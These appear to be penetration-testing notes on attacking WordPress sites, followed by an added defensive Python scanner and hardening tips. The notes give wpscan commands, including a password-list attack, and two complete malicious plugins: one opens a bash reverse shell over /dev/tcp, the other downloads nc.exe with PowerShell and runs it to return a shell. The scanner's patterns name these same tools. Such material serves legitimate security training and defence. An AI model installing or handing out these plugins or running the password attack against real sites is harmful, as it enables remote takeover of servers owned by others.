WordPress

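wpscan --url "$url"                                        # Default scan
wpscan --url "$url" -e vp                                  # Vulnerable plugins
wpscan --url "$url" -e cb                                  # Config backups
wpscan --url "$url" -e p --plugins-detection aggressive    # Popular plugins, aggressive detection
wpscan --url "$url" -U users.txt -P ~/rockyou.txt          # Password attack with user and password lists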

Visit the wp-content/plugins directory to view installed plugins

Reverse shell

You can also catch a reverse shell by editing Appearance > Editor > index.php

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.214/1337 0>&1'");
?>

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

system("powershell -c curl http://192.168.45.239/nc.exe -o C:\\programdata\\nc.exe");
system("C:\\programdata\\nc.exe 192.168.45.239 1337 -e powershell.exe");
?>

zip shell.zip shell.php
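
A defender's check for the plugin shells above, as an added example that is not part of the original notes: it walks a wp-content/plugins tree and flags PHP files that call command-execution functions, rating a file high when the code also references /dev/tcp, nc, curl or powershell. The function names, the pattern lists and the sample files (using the 192.0.2.10 documentation address) are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Command-execution calls; the lookbehind skips methods and curl_exec().
CMD_CALL = re.compile(r"(?<![\w>:$])(exec|system|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
# Strings suggesting the command opens a network channel or fetches a binary.
NET_HINT = re.compile(r"/dev/tcp/|\bnc(\.exe)?\b|\bcurl\b|powershell", re.I)
PLUGIN_NAME = re.compile(r"^[ \t/*#@]*Plugin Name:\s*(.+)$", re.M | re.I)
COMMENTS = re.compile(r"/\*.*?\*/|^[ \t]*(?://|#)[^\n]*", re.S | re.M)

def scan_file(path):
    """Return a finding for one PHP file, or None if it calls no command function."""
    src = Path(path).read_text(errors="replace")
    code = COMMENTS.sub("", src)  # ignore matches inside comments and headers
    calls = sorted({m.group(1).lower() for m in CMD_CALL.finditer(code)})
    if not calls:
        return None
    name = PLUGIN_NAME.search(src)
    return {"plugin": name.group(1).strip() if name else None, "calls": calls,
            "severity": "high" if NET_HINT.search(code) else "review"}

def scan_plugins(root):
    """Scan every .php file under a wp-content/plugins directory."""
    hits = ((p, scan_file(p)) for p in sorted(Path(root).rglob("*.php")))
    return [{"file": p.relative_to(root).as_posix(), **h} for p, h in hits if h]

# Constructed samples: two in the style of this page's plugins (address from the
# 192.0.2.0/24 documentation range) and one benign plugin that must not be flagged.
HEADER = "<?php\n/**\n* Plugin Name: %s\n*/\n"
SAMPLES = {
    "shell/shell.php": HEADER % "Reverse Shell Plugin"
        + "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/1337 0>&1'\");\n",
    "winshell/shell.php": HEADER % "Reverse Shell Plugin"
        + "system(\"C:\\\\programdata\\\\nc.exe 192.0.2.10 1337 -e powershell.exe\");\n",
    "gallery/gallery.php": HEADER % "Gallery"
        + "// system() is never called here\n$r = curl_exec($ch);\n",
}

def demo():
    """Write the samples to a temporary plugins directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            Path(root, rel).parent.mkdir(parents=True)
            Path(root, rel).write_text(body)
        return scan_plugins(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Setting DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS to true in wp-config.php removes the theme editor and the plugin upload path that these shells rely on.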
